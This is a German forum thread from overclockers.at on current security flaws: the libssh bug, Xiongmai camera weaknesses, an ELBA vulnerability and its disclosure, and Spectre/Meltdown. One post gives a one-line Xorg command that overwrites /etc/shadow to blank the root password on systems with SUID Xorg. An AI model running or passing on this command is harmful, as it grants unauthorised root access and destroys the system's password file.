"Christmas - the time to fix the computers of your loved ones" « Lord Wyrm

Aktuelle Sicherheitslücken

Hansmaulwurf 20.04.2014 - 11:17 54084 157
Posts

Hansmaulwurf

u wot m8?
Avatar
Registered: Apr 2005
Location: Wien
Posts: 5307
Fetter libssh Bug, openssh und github nicht betroffen.

Cobase

Mr. RAM
Avatar
Registered: Jun 2001
Location: Linz
Posts: 17713
Zitat aus einem Post von mr.nice.

Die Geräte-ID für den cloud Zugriff wird aus der MAC-Adresse des Geräts abgeleitet und ist nicht zufällig genug, es gibt hardgecodete default credentials die nicht geändert werden können, das verwendete hashing Verfahren ist ein bereits gebrochenes, die firmware ist unsigniert..

SEC Consult vermutet verwundbare Xiongmai-Technik unter anderem in den Geräten der folgenden Firmen: 9Trading, Abowone, AHWVSE, ANRAN, ASECAM, Autoeye, AZISHN, A-ZONE, BESDER/BESDERSEC, BESSKY, Bestmo, BFMore, BOAVISION, BULWARK, CANAVIS, CWH, DAGRO, datocctv, DEFEWAY, digoo, DiySecurityCameraWorld, DONPHIA, ENKLOV, ESAMACT, ESCAM, EVTEVISION, Fayele, FLOUREON , Funi, GADINAN, GARUNK, HAMROL, HAMROLTE, Highfly, Hiseeu, HISVISION, HMQC, IHOMEGUARD, ISSEUSEE, iTooner, JENNOV, Jooan, Jshida, JUESENWDM, JUFENG, JZTEK, KERUI, KKMOON, KONLEN, Kopda, Lenyes, LESHP, LEVCOECAM, LINGSEE, LOOSAFE, MIEBUL, MISECU, Nextrend, OEM, OLOEY, OUERTECH, QNTSQ, SACAM, SANNCE, SANSCO, SecTec, Shell film, Sifvision, sifsecurityvision, smar, SMTSEC, SSICON, SUNBA, Sunivision, Susikum, TECBOX, Techage, Techege, TianAnXun, TMEZON, TVPSii, Unique Vision, unitoptek, USAFEQLO, VOLDRELI, Westmile, Westshine, Wistino, Witrue, WNK Security Technology, WOFEA, WOSHIJIA, WUSONLUSAN, XIAO MA, XinAnX, xloongx, YiiSPO, YUCHENG, YUNSYE, zclever, zilnk, ZJUXIN, zmodo und ZRHUNTER.

Und die Heisl von Heise geben MAL WIEDER keinen Link zur Quelle an: https://www.sec-consult.com/blog/20...xmeye-p2p-coud/

Smut

takeover & ether
Avatar
Registered: Feb 2003
Location: VIE
Posts: 14793
Zitat aus einem Post von Hansmaulwurf
Fetter libssh Bug, openssh und github nicht betroffen.

generell ist hier eher weniger davon betroffen da libssh (nicht libssh2) eher selten zum einsatz kommt.
synology dürfte es erwischt haben. sftp/scp implementierungen würde ich auch prüfen.

hth

t3mp

I Love Gasoline
Avatar
Registered: Mar 2003
Location: upstairs
Posts: 6125
Vor allem server-mode fällt mir atm nichts ein, clients sind nicht betroffen.

Kirby

Little Overclocker
Avatar
Registered: Jun 2017
Location: Tyrol/Carinthia
Posts: 76
wenn mal jemand das root passwort vergessen hat und Xorg aufm linux rechner hat -->
"
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1
"

COLOSSUS

"Hi!"
Avatar
Registered: Dec 2000
Location: Wien || Stmk
Posts: 10762
Problematisch nur dann, wenn Xorg mit dem SUID-Bit und Owner root installiert ist. Das ist heute nicht mehr oft der Fall.

muene

forum slave
Avatar
Registered: Jan 2004
Location: @Home
Posts: 431
Falls hier jemand beruflich mit ELBA zu tun hat:

semteX

salty as fck
Avatar
Registered: Oct 2002
Location: lnz
Posts: 13000
warum is das ding ein zero day, wenns das update seit über nehm jahr gibt?

Smut

takeover & ether
Avatar
Registered: Feb 2003
Location: VIE
Posts: 14793
ältere Versionen sind verwundbar und es ist nicht gesagt dass nur latest supported ist.
Jedenfalls gibt es kaum kritischere Lücken in Software bzw. it services.

semteX

salty as fck
Avatar
Registered: Oct 2002
Location: lnz
Posts: 13000
Nein sorry, versteh ich ned. ELBA5 als supported version hat den patschn, ELBA5 is gepatched. Zero Day bedeutet dass der Exploit veröffentlicht wird bevor der Hersteller informiert ist bzw die Software patchen kann. Hier verging ein Jahr zwischn reporting und release (incl patch), was im Gegensatz zu den üblichen 3 Monaten von project zero eh fürstlich war :D

Ich geh davon aus, dass ältere ungepatchte Versionen nicht mehr supported werden, ansonsten könntest jetzt zampackn und heim gehen... Vor allem weil das ja kein "release in anger" war sondern in enger kooperation mit dem elba team..

aber ja, lücke die du vollautomatisch ausnützen kannst wenn du weißt wo du im intranet die instanzen stehen... schlimmer wirds nimmer. Und geiler find vom Herrn Bogner!

Smut

takeover & ether
Avatar
Registered: Feb 2003
Location: VIE
Posts: 14793
Stimmt eh. Über Zero day kannst streiten.
Er hat den zero day gefunden jedoch aufgrund von responsible disclosure nicht darüber berichtet. Zuletzt gab es nur die ankündigung dass etwas gefunden wurde und es demnächst veröffentlicht wird.

Kirby

Little Overclocker
Avatar
Registered: Jun 2017
Location: Tyrol/Carinthia
Posts: 76
Finds ja auch immer geil wiese eine Lücke schließen und dann mehrere wieder aufgehen.

Genau wie bei Spectre/Meltdown.

gepatched und wieder 5 poc exploit gefunden;)

Smut

takeover & ether
Avatar
Registered: Feb 2003
Location: VIE
Posts: 14793
Naja. Specter meltdown ist im wesentlichen ein Architekturproblem und ohne permission Management des caches wirst das nicht hinbekommen - oder halt ganz stark auf Performance verzichten.
Kann man also nicht pauschal sagen dass fixes neue Lücken aufreißen.

Kirby

Little Overclocker
Avatar
Registered: Jun 2017
Location: Tyrol/Carinthia
Posts: 76
Stimmt pauschal sagen dass fixes neue Lücken aufreisen kann man nicht.

Jedoch sollte man immer davon ausgehen das kein system sicher ist und man eig immeriwie zugriff drauf bekommt.

wergor

fantasiebefreit
Avatar
Registered: Jul 2005
Location: graz
Posts: 3058
Kontakt | Unser Forum | Über overclockers.at | Impressum | Datenschutz